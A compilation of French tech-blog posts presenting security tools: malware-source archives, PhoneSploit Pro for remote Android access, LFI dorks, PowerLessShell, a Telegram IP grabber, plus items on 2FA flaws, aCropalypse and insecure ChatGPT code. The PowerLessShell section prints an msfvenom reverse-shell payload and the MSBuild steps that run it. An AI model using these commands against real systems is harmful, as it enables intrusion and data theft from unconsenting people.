Pour installer le script (sous Linux), suivez les étapes ci-dessous :
Lancez ensuite Telegram Desktop, démarrez un appel avec votre correspondant et lancez le script comme ceci :
sudo python3 tg_get_ip.py
Et voilà ! Vous avez maintenant l’adresse IP de votre interlocuteur sur Telegram. N’oubliez pas que cet outil doit être utilisé de manière responsable et uniquement avec l’autorisation de la personne concernée.
Si vous vous êtes déjà demandé comment fonctionnaient les malwares, ces petits logiciel sournois qui infectent nos appareils et nous causent tant de problèmes, le mieux ce serait encore de vous plonger dans les entrailles de ces créations diaboliiiiques ;-). Petit rappel quand même, le but de cet article est de partager des connaissances et non de promouvoir des activités illégales.
C’est ce que permet ce dépôt GitHub géré par vx-underground, qui contient des tonnes de codes sources de logiciels malveillants, le tout classés par type (Android, Java, Linux, etc.). Tout est zippé et certaines archives sont protégées par le mot de passe « infected«
C’est donc dans cette base de malwares que vous trouverez des proof of concept, des botnets, des ransomwares et d’autres catégories de logiciels malveillants qui pourront vous donner un excellent aperçu de la manière dont ces bébêtes numériques fonctionnent et sont conçues.
Parmi les outils et familles de logiciels malveillants, vous découvrirez des PHP Infectors, des reverse shell, diverses backdoors, des outils de Phishing, des malwares en Python, Ruby, pour Win32, des Binders, des Botnets, des Crypters, des Exploit kits, des Ransomware, ou encore des Rootkits.
Ce trésor est le fruit des efforts de différents contributeurs et il est surtout maintenu à jour puisqu’on y trouve le dernier ransomware à la mode : HelloKitty dont les sources ont fuités ces derniers jours.
Je tiens quand même à vous rappeler que même si étudier ces codes sources peut être une excellente occasion d’apprendre comment ils fonctionnent et comment ils sont conçus, veillez à ne pas les utiliser à des fins malveillantes car vous irez en prison et ça me fera de la peine parce que j’aurai un lecteur en moins sur mon site. Ce serait con.
Ça vous dirait de comparer les différentes versions des binaires (.exe, .dll…etc) système de Windows pour essayer de déterminer les changements et les mises à jour apportés au fil du temps ? Vous pourriez avoir besoin de ces informations pour des raisons de sécurité, pour debugger un logiciel qui aurait des petites incompatibilité avec une version différente de Windows, ou simplement par curiosité. Quoi qu’il en soit, WinDiff est là pour vous faciliter la tâche.
WinDiff est un outil web open-source qui permet de parcourir et comparer les informations sur les symboles et les types des binaires présents sous Windows y compris en fonction des différentes versions existantes de l’OS. Composé d’un outil CLI (en ligne de commande) basé sur Rust et d’une interface web frontend en TypeScript, WinDiff utilise Winbindex pour trouver et télécharger les PEs et PDBs requis. Il se met à jour automatiquement avec les dernières mises à jour Windows et offre une interface conviviale pour visualiser les données. Vous pouvez d’ailleurs la tester ici.
Pour utiliser WinDiff, commencez par installer Rust 1.68+ et Node.js 16.8+ sur votre machine si vous ne l’avez pas déjà fait. Ensuite, suivez ces étapes :
Clonez le dépôt GitHub : git clone https://github.com/ergrelet/windiff.git
Accédez au répertoire cloné : cd windiff
Exécutez le script de construction frontend : ci/build_frontend.sh
Personnalisez le fichier de configuration si nécessaire (ci/db_configuration.json).
Les PRs (Pull Requests) pour ajouter de nouveaux binaires à la version live sont également les bienvenues pour les plus motivés d’entre vous.
Une fois que vous avez suivi ces étapes, vous pourrez lancer WinDiff et commencer à explorer les binaires de Microsoft Windows.
L’interface utilisateur de WinDiff est simple et facile à utiliser, même pour les débutants. Vous pouvez sélectionner les versions de Windows que vous souhaitez comparer, puis parcourir les informations sur les symboles et les types des binaires. Les données sont présentées de manière claire et organisée, facilitant la compréhension des différences entre les versions.
En résumé, WinDiff est un outil précieux pour quiconque souhaite comparer et analyser les binaires Microsoft Windows en fonction des versions du système d’exploitation. Que vous soyez un professionnel de la sécurité, un développeur ou simplement curieux, WinDiff peut vous aider à mieux comprendre l’évolution de Windows au fil du temps.
Vous le savez, les menaces en ligne sont partout, et pouvoir les analyser rapidement peut faire toute la différence. C’est pourquoi Qu1cksc0pe est l’arme idéale pour ce job.
Cet outil d’analyse de logiciels malveillants tout-en-un est capable d’analyser les binaires Windows, Linux, OSX ainsi que les documents, les fichiers APK et les archives. Cela permet à Qu1cksc0pe de dévoiler des informations contenues dans les binaires telles que les fichiers DLL utilisés, les fonctions et API, les sections et segments, sans oublier bien sûr tout ce qui a trait aux URLS, adresses IP et e-mails.
Cet outil vous fera sentir comme un véritable hacker dans son propre film d’action ^^.
Sachez également que Qu1cksc0pe fonctionnera sous Windows Subsystem Linux (WSL).
Étape 1 : Comment installer Qu1cksc0pe
Le vrai bonheur commence maintenant. Pour installer Qu1cksc0pe sur votre système, voici les commandes à exécuter:
Vous pouvez également effectuer des analyses avec VirusTotal, scanner les dossiers et même analyser des documents et des archives et pour cela, je vous invite à lire la doc !
Et en bonus…
Pour les vrais passionnés de terminal, Qu1cksc0pe peut également être lancé en mode interactif comme ceci :
python3 qu1cksc0pe.py --console
Bref pour conclure, je dirais que Qu1cksc0pe est un outil puissant pour toute personne intéressée par l’analyse de logiciels malveillants. Avec bonne variété de fonctionnalités, il permet aux utilisateurs d’avoir une vision complète et détaillée des fichiers suspects. Alors que vous soyez professionnel de la sécurité ou simplement quelqu’un qui aime bidouiller et explorer, Qu1cksc0pe est un choix intéressant.
Si vous êtes expert en sécurité, PhoneSploit Pro est un outil tout-en-un écrit en Python qui va vous intéresser. Spécialement conçu pour exploiter à distance les appareils Android en utilisant ADB (Android Debug Bridge) et Metasploit-Framework, ce projet vise à faciliter la réalisation de tests de pénétration sur les appareils Android.
Évidemment, PhoneSploit Pro peut également être utilisé comme une trousse à outils ADB pour effectuer diverses opérations sur les appareils Android que ce soit via le Wi-Fi ou un simple câble USB.
Parmi les nombreuses fonctionnalités de PhoneSploit Pro, il y a la connexion à distance à l’appareil en utilisant ADB, l’accès au shell de l’appareil connecté, l’arrêt du serveur ADB, etc… L’outil permet également de faire des captures d’écran et de les récupérer automatiquement sur votre ordinateur, ou encore d’enregistrer ce qui se passe à l’écran pendant une certaine durée.
Vous pourrez également télécharger et envoyer de fichiers, lancer une application et avoir accès aux moindres recoins du smartphone.
Voici quelques-unes des fonctionnalités de PhoneSploit Pro :
Copier toutes les photos de la caméra sur l’ordinateur.
Envoyer des SMS via le périphérique cible.
Déverrouiller et verrouiller le périphérique avec une facilité déconcertante.
Extraire tous les SMS, contacts et journaux d’appels du périphérique vers l’ordinateur.
Obtenir des informations sur le périphérique et la batterie.
Et obtenir une image de tout ce qui se passe à l’écran ou contrôler le périphérique cible.
Pour profiter de toutes ces fonctionnalités, il vous suffit de vous assurer que tous les logiciels requis sont installés, puis de suivre le tutoriel pour configurer votre téléphone Android. Une fois la configuration terminée, vous pourrez connecter votre téléphone Android à votre ordinateur via Wi-Fi en utilisant adb. Sur Linux ou macOS, ouvrez le terminal et collez les commandes suivantes pour installer PhoneSploit Pro :
Puis téléchargez la dernière version de platform-tools et copiez tous les fichiers extraits de platform-tools ou du répertoire adbdirectory dans le répertoire PhoneSploit-Pro, et enfin exécutez
python phonesploitpro.py.
PhoneSploit Pro est compatible avec plusieurs systèmes d’exploitation, mais je vous recommande d’utiliser Linux pour profiter pleinement de ses fonctionnalités.
Évidemment, ce projet est uniquement destiné à des fins éducatives ou dans le cadre d’une mission de cybersécurité réalisée par un professionnel. L’utilisation de cet outil sur le téléphone de quelqu’un sans sa permission est totalement interdite et vous finirez en prison si vous ne respectez pas la loi (sauf si à un moment vous avez eu une responsabilité politique importante. Dans ce cas, vous n’aurez qu’un bracelet électronique et vous pourrez continuer à mener une vie normale).
LFI Space Tool est un outil « tout-en-un » conçu pour détecter les vulnérabilités d’inclusion de fichiers locaux (LFI) dans les applications web notamment grâce à des dorks LFI.
L’outil permet de faciliter l’identification des failles de sécurité potentielles grâce à deux méthodes de repérage : la recherche de dorks Google et le ciblage d’URL via une liste que vous fournissez.
Voici quelques uns de ces dorks (vous pouvez évidemment rajouter les votre) :
Que vous soyez un professionnels de la sécurité informatique, un pentester, un hacker éthique ou un développeur voulant évaluer rapidement la sécurité de son application web, LFI Space Tool peut être une bonne entrée en la matière même si évidemment, ça ne fait pas tout.
Voici une démo du fonctionnement de LFI Space :
Pour l’installer, ouvrez un terminal et entrez les commandes suivantes :
LFI Space Tool est un atout précieux pour tous ceux qui souhaitent améliorer la sécurité leurs applications web même si une fois encore, ce n’est pas un outil miracle qui viendra remplacer votre bon vieux cerveau, donc ne vous contentez pas uniquement de ça.
Wholeaked est l’outil parfait pour tous ceux qui veulent partager des fichiers en gardant l’esprit en paix. Wholeaked, codé en Go, est un moyen ingénieux de détecter qui est responsable d’une fuite de données.
Imaginez un instant que vous ayez besoin d’envoyer un document important et confidentiel à quelqu’un. Comment être sûr que ce « quelqu’un » ne vous trahisse pas en diffusant ensuite ce document publiquement ?
C’est là que Wholeaked entre en jeu. Il prend le fichier que vous voulez partager et une liste de destinataires et ajoute une signature unique à chaque fichier secrètement (watermark). Ensuite, il peut envoyer automatiquement les fichiers aux destinataires correspondants en utilisant des intégrations Sendgrid, AWS SES ou SMTP. Au lieu de les envoyer par e-mail, vous pouvez également les partager manuellement. Wholeaked fonctionne avec tous les types de fichiers, mais il dispose de fonctionnalités supplémentaires pour les types de fichiers courants type PDF, DOCX, XLSX, PPTX, MOV, JPG, PNG, GIF, EPS, AI et PSD.
Dans un monde idéal, Wholeaked serait votre poucave préférée dans la lutte contre les fuites de données. Pour identifier qui est responsable d’une fuite, il suffit de fournir le fichier divulgué à Wholeaked, et il révèlera la personne responsable en comparant les signatures dans la base de données. C’est comme les empreintes digitales laissées sur une scène de crime, mais dans le monde numérique !
Wholeaked utilise 3 types de signatures : binaire, métadonnées et filigrane. La signature binaire est directement ajoutée au binaire, la signature de métadonnées est ajoutée à une section de métadonnées d’un fichier, et le filigrane invisible est insérée dans le texte.
Pour installer Wholeaked, vous pouvez télécharger les binaires à partir de la page des releases GitHub et les exécuter. Ou, si vous préférez, vous pouvez également installer Go sur votre système et exécuter la commande
go install github.com/utkusen/wholeaked@latest
N’oubliez pas non plus d’installer exiftool pour ajouter des signatures aux métadonnées des fichiers et également pdftotext pour vérifier les filigranes dans les fichiers PDF. Les instructions d’installation sont dispo pour Debian, macOS et Windows.
A vous de jouer maintenant pour protéger vos données et lutter contre les petites fuites.
PowerLessShell est un outil incroyable pour les passionnés de PowerShell et de sécurité informatique. Qui aurait cru qu’on pouvait exécuter des scripts et des commandes PowerShell sans même lancer powershell.exe ? Et pour couronner le tout, il permet également d’exécuter du shellcode brut ! C’est de la sorcellerie !
La puissance de cet outil réside dans son utilisation de MSBuild.exe. La combinaison des deux permet d’obtenir un résultat vraiment cool pour les pro du Powershell. Certaines conditions peuvent être utilisées avec MSBuild pour empêcher l’exécution du code si elles ne sont pas remplies, ce qui ajoute une couche de sécurité.
La beauté de PowerLessShell, c’est qu’il utilise des arguments de ligne de commande pour générer le fichier final et il peut générer une charge utile PowerShell ou shellcode. C’est donc très utile également pour les pros en sécurité informatique.
Le concept est très bien expliqué avec des exemples concrets comme celui-ci :
$ python PowerLessShell.py -source shellcode64.raw -output malicious.csproj -arch 64
PowerLessShell Less is More
Mr.Un1k0d3r RingZer0 Team
-----------------------------------------------------------
Generating the msbuild file using include/template-shellcode.csproj as the template
Generating a payload for a 64 bits shellcode! Don't forget to use the 64 bits version of msbuild.exe
File 'malicious.csproj' created
Process completed
Le processus est assez simple et direct, même pour ceux qui n’ont pas beaucoup d’expérience avec PowerShell ou MSBuild.
Et ce n’est pas tout ! Un script nommé Cobalt Strike Aggressor (wmi_msbuild.cna) est également disponible avec des instructions pour la configuration et l’utilisation. Si vous n’avez jamais entendu parler de Cobalt Strike, c’est une plateforme de post-exploitation professionnelle de qualité militaire.
Le plus impressionnant, c’est que tout ceci a été mis au point par une seule personne : Mr.Un1k0d3r.
Alors, comment utiliser ce merveilleux outil en pratique ?
Voici un exemple d’utilisation de PowerLessShell pour générer un shellcode avec l’outil msfvenom de Metasploit et ensuite l’exécuter avec MSBuild :
msfvenom -a x64 --platform Windows -p windows/shell_reverse_tcp LHOST=192.168.1.10 LPORT=1234 -b '\\x00\\x0A\\x0D' -i 20 -f csharp
Ensuite, utilisez PowerLessShell pour injecter le shellcode dans un fichier MSBuild :
PowerLessShell.exe -s <shellcode> -w 20
Finalement, exécutez le fichier malveillant avec MSBuild :
MSBuild.exe malicious.csproj
Voilà, le tour est joué ! Il vous suffira d’écouter la connexion entrante shell_reverse_tcp sur votre serveur pour guetter la connexion du client malveillant et prendre le contrôle. C’est un exemple simple mais puissant de ce que PowerLessShell peut faire. Evidemment, c’est à manipuler avec éthique, dans un cadre de recherche ou lors d’une mission de sécurité informatique.
En conclusion, que vous soyez un professionnel de la sécurité informatique ou simplement quelqu’un qui aime bidouiller et apprendre, cet outil vous surprendra à coup sûr. N’hésitez pas à visiter le GitHub de PowerLessShell pour en savoir plus ici.
Aujourd’hui, je vous présente Xreveal, le petit génie dans la lampe qui va vous permettre de déchiffrer vos DVD et Blu-ray en arrière-plan, le tout en un rien de temps ! Mais avant de vous en dire plus, mettons les choses au clair : vous aurez besoin de clés de décryptage AACS/FUT BD+ pour faire fonctionner ce logiciel.
À première vue, Xreveal peut sembler un simple logiciel de déchiffrement de DVD/BD, mais détrompez-vous, il est bien plus que ça. Ce logiciel est le fruit d’un projet de recherche visant à faciliter l’interopérabilité et s’appuie exclusivement sur la spécification publique officielle AACS pour décoder les disques. En d’autres termes, Xreveal est un précieux allié pour les adeptes du Home Cinéma tels que vous et moi.
Grâce à Xreveal, fini les problèmes de lecture de DVD ou de Blu-ray protégés par un système de verrouillage. En effet, ce logiciel déchiffre la sécurité des DVD/BD à la volée, permettant ainsi à votre programme de lecture ou de copie de les lire sans aucune difficulté. C’est comme avoir son propre passe-partout pour accéder à tous ces films que vous adorez ! 🗝️
L’un des points forts de Xreveal réside dans sa simplicité d’utilisation. Une fois le logiciel installé, il fonctionne en arrière-plan sans même que vous vous en aperceviez. En parallèle, il vous donne la possibilité de lire ou de copier vos DVD/BD protégés en toute tranquillité.Maintenant que vous êtes convaincus de la puissance de Xreveal, voici un petit tutoriel pour vous aider à l’installer et à l’utiliser:
Installez Xreveal en suivant les instructions à l’écran.
Le logiciel est maintenant prêt à l’emploi ! Insérez un DVD ou Blu-ray protégé dans le lecteur de votre choix et Xreveal déchiffrera automatiquement le disque à la volée pour que vous puissiez le lire sans problème.
Et voilà, le tour est joué ! Vous pouvez désormais profiter de tous vos DVD et Blu-ray sans vous soucier des systèmes de protection. Alors oui, je sais, ça serait mieux avec la clé de déchiffrement, mais comme c’est illégal de la partager, bah c’est pas dans le soft.
En somme, si vous êtes à la recherche d’une solution simple et efficace pour décoder vos DVD et Blu-ray, ne cherchez pas plus loin. Xreveal est sans conteste l’outil qu’il vous faut. À noter que Xreveal n’a pas pour vocation de promouvoir le piratage. Il s’agit simplement d’un outil d’interopérabilité pour les passionnés de Home Cinéma.
Récemment, je suis tombé sur MetaOSINT, un projet créé par un ancien analyste et enquêteur OSINT qui en avait assez de chercher des ressources de manière plutôt brouillonne. Il a donc créé un agrégateur gratuit et ouvert regroupant la crème de la crème en matière d’outils et de ressources OSINT.
MetaOSINT est comme un couteau suisse pour les enquêteurs OSINT. Il répertorie et trie des milliers d’outils provenant de trois sources différentes, chaque source ayant un niveau de confiance et de biais potentiel qui lui est propre. Avec plus de 4000 ressources recensées, vous avez ainsi accès à un trésor d’informations et d’outils pour vous aider dans vos enquêtes en ligne.
En parcourant MetaOSINT, j’ai eu l’impression d’être un enfant dans un magasin de bonbons. Chaque outil semblait plus utile que le précédent. Le monde de l’OSINT peut être assez vaste et intimidant, surtout pour ceux qui débutent, mais MetaOSINT rend la tâche beaucoup plus accessible. C’est un peu comme un ami expérimenté qui vous prend par la main pour vous montrer les bons outils et les bonnes ressources. Grâce à ce site, vous serez en mesure de mener des enquêtes plus approfondies et de trouver des informations pertinentes plus rapidement.
Et si la compilation des meilleurs outils et ressources OSINT ne vous suffit pas, MetaOSINT invite également la communauté à contribuer au projet. Si vous avez un outil ou un site Web OSINT de qualité et qui n’est pas encore répertorié, vous pouvez soumettre ses infos via un formulaire dédié. Les connaissances collectives de la communauté OSINT peuvent certainement aider à faire ressortir de nouvelles pépites.
Bien sûr, avec un grand pouvoir vient une grande responsabilité. Comme disait le grand père de Spider-Man: « Un grand pouvoir implique de grandes responsabilités, et comme t’es pas Président de la République, tu devras rendre des comptes. »
Alors utilisez ces outils et ressources de manière responsable. Soyez éthique dans vos recherches et n’utilisez pas ces informations à mauvais escient. Souvenez-vous que l’objectif d’une enquête OSINT est de rester dans les limites légales et éthiques.
Relyze est un outil pour Windows vraiment cool qui permet de désassembler, décompiler et comparer des binaires de code natif.
J’ai commencé à regarder toutes les fonctionnalités de cet outil et j’ai vite compris que j’allais en faire un article sur mon site. Avec Relyze, il est possible de naviguer dans la structure des binaires pour comprendre comment ils sont composés. C’est un peu comme avoir une carte pour explorer un labyrinthe numérique, mais au lieu de chercher la sortie, on cherche les trucs intéressants planqués à l’intérieur.
Ce qui est génial avec Relyze, c’est qu’on peut également visualiser les données et ainsi enrichir votre analyse. Par exemple, il est possible de décompiler du code natif de bas niveau en un pseudo-code plus compréhensible pour les humains, ce qui permet de mieux comprendre le comportement du programme. Comme le disait ce bon vieux Einstein : « Si vous ne pouvez pas l’expliquer simplement, c’est que vous z’avez rien compris bande de noobs. » Ça n’a jamais été aussi vrai qu’avec Relyze.
Le fait de pouvoir visualiser les relations entre le code et les données avec des graphes interactifs de flux de contrôle, d’appels et de références permet de mieux comprendre les connexions présentes au sein des binaires que vous reversez.
Imaginez deux binaires, un peu comme deux empreintes digitales différentes. Avec Relyze, vous pouvez effectuer une analyse différentielle de ces binaires et explorer aussi bien leurs similitudes que leurs différences. C’est parfait pour analyser par exemples des correctifs de sécurité ou des variantes de logiciels malveillants.
Relyze prend en charge les formats de fichiers binaires Portable Executable (PE) et Executable and Linking Format (ELF), ainsi que les formats de symboles tels que PDB, COFF intégré, STAB, TDS et les fichiers MAP. Les architectures prises en charge comprennent x86, x64, ARM32 (ARMv7 incluant le mode Thumb) et ARM64 (AArch64).
Relyze permet également d’obtenir rapidement un aperçu du binaire en affichant notamment des informations sur le fichier, ses hashs associés, les fichiers inclus dedans, ainsi que les mitigations de sécurité disponibles, les graphes d’entropie et les certificats de sécurité intégrés.
L’interface de Relyze se veut moderne et épurée, mettant l’analyse au centre de l’attention. Tout est conçu pour être intuitif et efficace. Bref, un vrai outil tout en un pour l’analyse des binaires.
Vous pouvez même étendre les capacités du logiciel avec vos propres plugins en Ruby si ça vous amuse !
Bref, c’est un super outil bien complet pour l’analyse de binaires qui vous rappellera un peu Ghidra ou Hopper notamment de par toutes les fonctionnalités disponibles. Si vous faites du reverse engineering, je vous encourage vivement à l’essayer en cliquant ici.
Vous avez toujours été fasciné par le monde mystérieux de la cryptographie ?
Et bien, aujourd’hui, je vous présente une plateforme en ligne gratuite et vraiment très fun qui va vous permettre de vous plonger dans cet univers captivant: CryptoHack !
Cette plateforme en ligne vous propose une série d’énigmes crypto et de défis pour apprendre la cryptographie moderne tout simplement en… la cassant. Hé oui !
Ainsi, en résolvant des défis, vous gagnerez des points ce qui vous fera monter dans le classement. Avant de commencer, vous devrez évidemment installer Python et pip ainsi que diverses libs qui vous seront demandés au fur et à mesure des challenges.
Les défis de CryptoHack couvrent divers sujets liés à la crypto et ceux-ci deviendront de plus en plus pointus au fur et à mesure de votre progression. Mais rassurez-vous, ce sera toujours bien expliqué dans les leçons (en anglais et très fun à faire. C’est comme un jeu finalement et en plus, c’est totalement gratuit.
À vous de jouer ! Et vous trouverez également d’autres ressources (dont root_me) pour vous exercer au Ethical Hacking en cliquant sur ce lien.
Amis du partage de fichiers et de la sécurité, voici une application qui devrait vous plaire si vous voulez transmettre des documents perso sans les déposer sur un serveur qui ne vous appartient pas.
Cela s’appelle Rymdport (anciennement connu sous le nom de wormhole-gui), c’est un logiciel qui fonctionne sur tous les OS et qui permet de partager sans prise de tête des fichiers, dossiers et même du texte entre différents appareils comme les dignes pirates que vous êtes.
Tout ce que vous transmettez avec Rymdport est chiffré de bout en bout grâce au protocole magic-wormhole donc j’ai déjà parlé ici et cerise sur le gâteau, Rymdport est compatible avec d’autres clients wormhole. Chouette non ?
Rymdport est basé sur wormhole-william, une implémentation native en Go de magic-wormhole. Du coup, il se compile en un binaire natif sans dépendances et offre des performances supérieures à celles de magic-wormhole.
Pour télécharger Wormhole, rendez-vous sur la page des releases. Vous y trouverez des versions pour Windows macOS, Linux et même FreeBSD. Et pour les utilisateurs de Linux, Rymdport est également disponible en tant que Flatpak sur Flathub.
Notez que les les binaires proposé pour macOS ne sont pas signés avec un certificat Apple officiel. Pour résoudre le problème, il vous faudra virer l’attribut de quarantaine de l’application avec la commande suivante :
Cette semaine, tout le monde était super jouasse puisque Google Authenticator s’est vu ajouter une fonction permettant de sauvegarder les données 2FA dans le cloud Google et ainsi, en faciliter la restauration qu’on soit sous Android ou iOS.
Alors oui, ça semble super cool surtout pour ceux qui ont peur de perdre leurs données ou qui ont déjà perdu un smartphone. Mais ATTENTION !
Cette nouvelle option soulève pas mal de préoccupations en matière de confidentialité. D’après les chercheurs en sécurité de Mysk, il semblerait que les données ne soient pas chiffrées de bout en bout. Ainsi, Google pourrait voir et stocker les « secrets » (seed 2FA) sur ses serveurs, sans rien pour sécuriser ces informations.
C’est hyper inquiétant, car chaque code QR 2FA contient un secret qui est utilisé pour générer ces codes 2FA à usage unique. Si quelqu’un de mal intentionné obtient ce secret, il peut très facilement contourner la protection 2FA.
Le drame illustré en 3 actes :
Et même si je ne doute pas de la sécurité des serveurs chez Google, on sait tous que même les entreprises les plus préparées subissent parfois des fuites de données.
D’ailleurs, dans ce backup en route vers le cloud Google, on trouve également d’autres informations, telles que le nom du compte et le nom du service. Comme Google peut y accéder en clair, ils savent donc exactement quels services en ligne vous utilisez. Go la pub personnalisée !!
Et si vous demandez à Google un export de vos données personnelles, vous ne trouverez pas de trace de ces fameux secrets 2FA. Bref, j’ai l’impression qu’il sont tombés derrière l’armoire.
Les chercheurs conseillent donc de désactiver cette fonctionnalité de synchronisation jusqu’à ce que le chiffrement de bout en bout soit effectif (avec phrase de passe donc…)
Bref, maintenant vous savez. Une personne azerty en vaut deux… (roh roh roh)
Il y a quelque temps, j’ai découvert une étude intéressante réalisée par des chercheurs de l’Université du Québec sur la sécurité du code généré par ChatGPT, le modèle de langage développé par OpenAI. Vous vous demandez peut-être ce qu’ils ont trouvé ? Eh bien, accrochez-vous, car les résultats sont surprenants !
Les chercheurs ont demandé à ChatGPT de générer 21 programmes et scripts dans différents langages, et seuls cinq d’entre eux étaient sécurisés dès la première tentative. Après avoir insisté pour que ChatGPT corrige ses propres erreurs, ils ont réussi à obtenir sept codes sécurisés de plus.
Une partie du problème semble provenir du fait que ChatGPT ne prend pas en compte un modèle d’exécution de code de type « adversarial« . En d’autres termes, il ne considère pas que le code qu’il génère pourrait être utilisé à des fins malveillantes. De plus, ChatGPT refuse de créer un code offensif, mais créera volontiers un code vulnérable, ce que les auteurs considèrent comme une incohérence éthique.
Les chercheurs ont également constaté qu’une des « réponses » de ChatGPT comme solution miracle aux préoccupations de sécurité était d’avoir uniquement des entrées valides, ce qui n’est pas vraiment réaliste dans le monde réel. De plus, le modèle ne fournit jamais de conseils utiles pour renforcer la sécurité d’un code, sauf si on lui demande précisemment de remédier aux problèmes. Et pour lui demander ça, il faut savoir quelles demandes lui formuler exactement, ce qui veut dire que vous devez vous-même être familier du langage et des vulnérabilités, par avance.
En conclusion de leur étude, les chercheurs pensent que ChatGPT, sous sa forme actuelle, représente un risque et que l’IA est victime du syndrome de Dunning Krüger. Les étudiants et les développeurs doivent être parfaitement conscients que le code généré avec ce type d’outil peut être non sécurisé. De plus, le comportement du modèle est imprévisible, car il peut générer un code sécurisé dans un langage et un code vulnérable dans un autre.
Bref, si vous utilisez ChatGPT ou un autre outil similaire (Github Copilot…etc) pour générer du code, gardez à l’esprit qu’il ne faut pas prendre pour argent comptant que le code fourni est sécurisé. Soyez vigilant et assurez-vous de vérifier et de tester le code pour détecter les éventuelles vulnérabilités. Et n’oubliez pas, comme dit Gaston Lagaffe : « La sécurité avant tout ! »
Aujourd’hui les amis, on va parler cybersécurité avec notamment la fameuse certification OSCP dont vous avez peut-être déjà entendu parler.
OSCP, qui signifie Offensive Security Certified Professional, est une certification, créé par Offsec, très réputée dans le milieu cyber puisqu’elle permet à tous ceux qui l’obtiennent d’attester qu’ils ont les compétences professionnelles nécessaires pour exercer en cybersécurité notamment en pentesting. OSCP couvre un large panel de thématiques, allant des bases du réseau TCP/IP, à l’administration Windows, aux langages comme Bash / Python ou encore la bonne compréhension du fonctionnement d’Active Directory etc.
Pour rappel, Offsec (Offensive Security) est également la société à l’origine de la distribution Kali Linux dont je parle régulièrement ici.
Si vous obtenez cette certification de haut niveau, vos compétences en pentesting ne seront plus à prouver et votre profil sera immédiatement valorisé dans le monde entier. Même chose si vous êtes chef d’entreprise, DSI, responsable sécurité et que vous souhaitez développer ces compétences parmi vos équipes.
Mais attention, la certification OSCP n’est pas qu’un simple QCM à passer. Il s’agit d’une certification d’assez haut niveau avec une approche par la pratique en conditions réelles ce qui permet aux participants d’explorer les outils, les techniques et les environnements qui leur permettront de renforcer leurs compétences et leur apprentissage.
Enfin, quand vous serez prêts pour le jour de l’examen, vous devrez hacker un maximum de machines à dispo pour la certification, collecter des informations, créer des scripts, exploiter des vulnérabilités, résoudre des problèmes de manière la plus créative possible… Tout ça sur une durée limitée de 23h45, en étant armé simplement de vos connaissances et d’une machine Kali Linux. Et vous devrez par la suite produire un rapport d’audit et l’envoyer à Offsec pour valider votre travail.
Ambient IT est reconnu pour son expertise et son expérience dans le domaine de la cybersécurité et de la formation. Les formateurs qui dispensent les cours sont également certifiés OSCP et ont une solide expérience pratique en pentesting. Leur programme de formation est très complet et très bien structuré afin que vous puissiez mettre toutes les chances de votre côté pour le jour de l’examen.
En prérequis, évidemment, vous devrez avoir un petit niveau en bash / python, bien vous y connaitre en réseau TCP/IP, savoir administrer une machine Linux et Windows.
Ensuite, chaque lundi matin de 9h à 12h30, et ce pendant 8 semaines, Ambient IT vous formera et vous coachera pour l’examen OSCP. Au total, vous aurez plus de 28 heures de cours en Français étalés sur 8 semaines, avec des exercices et des choses à réviser pendant la semaine.
Prochaine session : Le 11 septembre 2023 !
Puis une fois les concepts et les techniques bien assimilés, vous pourrez effectuer un passage à l’examen OSCP.
En plus de ce que propose Ambient IT, vous aurez également accès aux contenus et services proposés par Offsec, à savoir plusieurs heures de formations en vidéo, un livret PDF, un accès au forum pour que les apprenants puissent poser leurs questions et bien sûr un accès illimité durant toute la formation, au lab, c’est-à-dire à des machines sur lesquelles vous allez pouvoir vous entrainer.
Et comme Ambient IT travaille officiellement avec Offsec, vous aurez également accès à tout le contenu officiel proposé par Offsec pour passer la certif.
Notez que si vous vous inscrivez à une session en 2023, Ambient IT vous proposera 400 € de réduction pour toute inscription si vous mentionnez « Korben » au moment où ils vous appelleront (Offre soumise à condition d’achat et non cumulable avec d’autres promotions ou réductions en cours).
Si vous utilisez Authy, l’application de génération de codes 2FA, vous avez peut-être remarqué qu’on ne pouvait pas forcement exporter les datas et migrer tout ça vers un autre logiciel 2FA.
La bonne pratique en général, c’est de conserver le code TOTP ou le QR Code associé pour pouvoir par la suite l’importer dans une autre application. Mais la réalité c’est que peu de monde le fait.
On scanne le QR Code et basta, jamais on le sauvegarde. Sauf que le jour où on perd son téléphone, c’est la cata. Avec Authy, y’a un backup sur leurs serveurs, mais pas de possibilité de migration.
Mais j’ai une solution pour vous. Cela s’appelle Authy Export et c’est un logiciel développé en Python qui vous rappellera les anciens cracks des années 90 et qui vous permettra d’exporter l’ensemble de vos codes OTP dans un fichier HTML avec tout ce qu’il faut (URL + QRCode) pour pouvoir à nouveau les scanner.
Pour faire fonctionner Authy Export, vous aurez besoin de la version Desktop d’Authy synchronisé avec votre compte et non verrouillée par un mot de passe. Cliquez ensuite sur le bouton « Click to export TOTP » du logiciel et patientez quelques instants que l’export se fasse.
Évidemment, faites bien attention ensuite de conserver ce fichier dans un endroit sûr (chiffré de préférence) pour éviter que quelqu’un ne mette la main dessus.
Voilà, j’espère que ce petit outil de ma confection vous sera utile 🙂
Allez, ce matin, on va se faire plaisir. Je vais vous parler de la faille sécurité CVE-2023-21036 connue également sous le nom aCropalypse. Cela touche principalement les gens qui ont des smartphones Google Pixel et qui s’amusent recadrer leurs photos.
Alors en quoi ça consiste ? Et bien cela permet de récupérer des données dans des fichiers PNG qui ont été tronqués. Ainsi, un attaquant pourrait, en exploitant cette faille, restaurer des informations personnelles qui auraient été retirées d’une image comme des adresses postales ou des données bancaires, le tout à partir d’images mises en ligne. Flippant (ou trop cool… lol) !!
Pour mieux comprendre, imaginez que vous preniez une capture d’écran d’un mail contenant votre adresse personnelle, puis que vous la recadriez pour ne montrer que le produit que vous avez acheté et masquer vos données personnelles. Grâce à cette faille, il est tout à fait possible de récupérer la partie supprimée de l’image, y compris votre adresse.
Alors comment fonctionne cette vulnérabilité ?
Et bien cela repose sur la compression zlib utilisée dans les fichiers PNG. Normalement, il est très difficile de décompresser des données compressées sans connaître l’arbre de Huffman utilisé pour effectuer cette compression. Toutefois, dans le cas spécifique de cette exploitation de faille, en trouvant le début d’un bloc de codage Huffman, il devient possible de le décompresser à partir de celui-ci.
L’algorithme utilisé est assez simple : il parcoure chaque décalage binaire et, lorsqu’un décalage correspondant au début d’un bloc de Huffman est trouvé, il tente de décompresser les données en le prenant comme point de départ. Ainsi, si les données se décompressent, c’est OK. Sinon, il passe au décalage suivant.
for each bit-offset:
if it doesn't look like the start of a dynamic huffman block:
skip this offset
try decompressing from that offset:
if the decompressed data looks plausible:
return decompressed data!
catch decompression errors:
continue
Et voilà comment on récupère des données effacées sur des PNG.
